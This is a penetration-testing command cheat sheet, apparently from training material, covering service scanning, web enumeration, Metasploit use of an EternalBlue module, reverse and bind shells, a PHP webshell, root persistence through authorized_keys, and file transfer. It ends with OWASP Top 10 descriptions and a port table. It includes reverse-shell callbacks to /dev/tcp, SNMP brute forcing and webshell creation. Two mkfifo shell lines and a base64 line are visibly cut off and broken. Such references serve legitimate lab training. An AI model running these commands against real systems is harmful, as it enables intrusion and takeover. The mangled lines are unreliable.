Basic tools and commands

Basic Tools

Command	Description
General
sudo openvpn user.ovpn	Connect to VPN
ifconfig/ip a	Show our IP address
netstat -rn	Show networks accessible via the VPN
ssh user@10.10.10.10	SSH to a remote server
ftp 10.129.42.253	FTP to a remote server
tmux
tmux	Start tmux
ctrl+b	tmux: default prefix
prefix c	tmux: new window
prefix 1	tmux: switch to window (1)
prefix shift+%	tmux: split pane vertically
prefix shift+"	tmux: split pane horizontally
prefix ->	tmux: switch to the right pane
Vim
vim file	vim: open file with vim
esc+i	vim: enter insert mode
esc	vim: back to normal mode
x	vim: Cut character
dw	vim: Cut word
dd	vim: Cut full line
yw	vim: Copy word
yy	vim: Copy full line
p	vim: Paste
:1	vim: Go to line number 1.
:w	vim: Write the file 'i.e. save'
:q	vim: Quit
:q!	vim: Quit without saving
:wq	vim: Write and quit

Pentesting

Service Scanning

Service Scanning
nmap 10.129.42.253	Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253	Run an nmap script scan on an IP
locate scripts/citrix	List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40	Run an nmap script on an IP
netcat 10.10.10.10 22	Grab banner of an open port
smbclient -N -L \\\\10.129.42.253	List SMB Shares
smbclient \\\\10.129.42.253\\users	Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0	Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254	Brute force SNMP secret string

Web Enumeration

Web Enumeration
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt	Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt	Run a sub-domain scan on a website
curl -IL https://www.inlanefreight.com	Grab website banner
whatweb 10.10.10.121	List details about the webserver/certificates
curl 10.10.10.121/robots.txt	List potential directories in robots.txt
ctrl+U	View page source (in Firefox)

Public Exploits

Public Exploits
searchsploit openssh 7.2	Search for public exploits for a web application
msfconsole	MSF: Start the Metasploit Framework
search exploit eternalblue	MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec	MSF: Start using an MSF module
show options	MSF: Show required options for an MSF module
set RHOSTS 10.10.10.40	MSF: Set a value for an MSF module option
check	MSF: Test if the target server is vulnerable
exploit	MSF: Run the exploit on the target server is vulnerable

Using Shells

Using Shells
nc -lvnp 1234	Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'	Send a reverse shell from the remote server
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f	/bin/sh -i 2>&1'
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f	/bin/bash -i 2>&1
nc 10.10.10.1 1234	Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")'	Upgrade shell TTY (1)
ctrl+z then stty raw -echo then fg then enter twice	Upgrade shell TTY (2)
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php	Create a webshell php file
curl http://SERVER_IP:PORT/shell.php?cmd=id	Execute a command on an uploaded webshell

Privilege Escalation

Privilege Escalation
./linpeas.sh	Run linpeas script to enumerate remote server
sudo -l	List available sudo privileges
sudo -u user /bin/echo Hello World!	Run a command with sudo
sudo su -	Switch to root user (if we have access to sudo su)
sudo su user -	Switch to a user (if we have access to sudo su)
ssh-keygen -f key	Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys	Add the generated public key to the user
ssh root@10.10.10.10 -i key	SSH to the server with the generated private key

Transferring Files

python3 -m http.server 8000	Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh	Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh	Download a file on the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh	Transfer a file to the remote server with scp (requires SSH access)
base64 shell -w 0	Convert a file to base64
`echo f0VMR...SNIO...InmDwU	base64 -d > shell`
md5sum shell	Check the file's md5sum to ensure it converted correctly

OWASP Top 10

references to the OWASP Top 10

Number	Category	Description
1.	Broken Access Control	Restrictions are not appropriately implemented to prevent users from accessing other users accounts, viewing sensitive data, accessing unauthorized functionality, modifying data, etc.
2.	Cryptographic Failures	Failures related to cryptography which often leads to sensitive data exposure or system compromise.
3.	Injection	User-supplied data is not validated, filtered, or sanitized by the application. Some examples of injections are SQL injection, command injection, LDAP injection, etc.
4.	Insecure Design	These issues happen when the application is not designed with security in mind.
5.	Security Misconfiguration	Missing appropriate security hardening across any part of the application stack, insecure default configurations, open cloud storage, verbose error messages which disclose too much information.
6.	Vulnerable and Outdated Components	Using components (both client-side and server-side) that are vulnerable, unsupported, or out of date.
7.	Identification and Authentication Failures	Authentication-related attacks that target user's identity, authentication, and session management.
8.	Software and Data Integrity Failures	Software and data integrity failures relate to code and infrastructure that does not protect against integrity violations. An example of this is where an application relies upon plugins, libraries, or modules from untrusted sources, repositories, and content delivery networks (CDNs).
9.	Security Logging and Monitoring Failures	This category is to help detect, escalate, and respond to active breaches. Without logging and monitoring, breaches cannot be detected..
10.	Server-Side Request Forgery	SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).

Ports:

Port(s)	Protocol
20/21 (TCP)	FTP
22 (TCP)	SSH
23 (TCP)	Telnet
25 (TCP)	SMTP
80 (TCP)	HTTP
161 (TCP/UDP)	SNMP
389 (TCP/UDP)	LDAP
443 (TCP)	SSL/TLS (HTTPS)
445 (TCP)	SMB
3389 (TCP)	RDP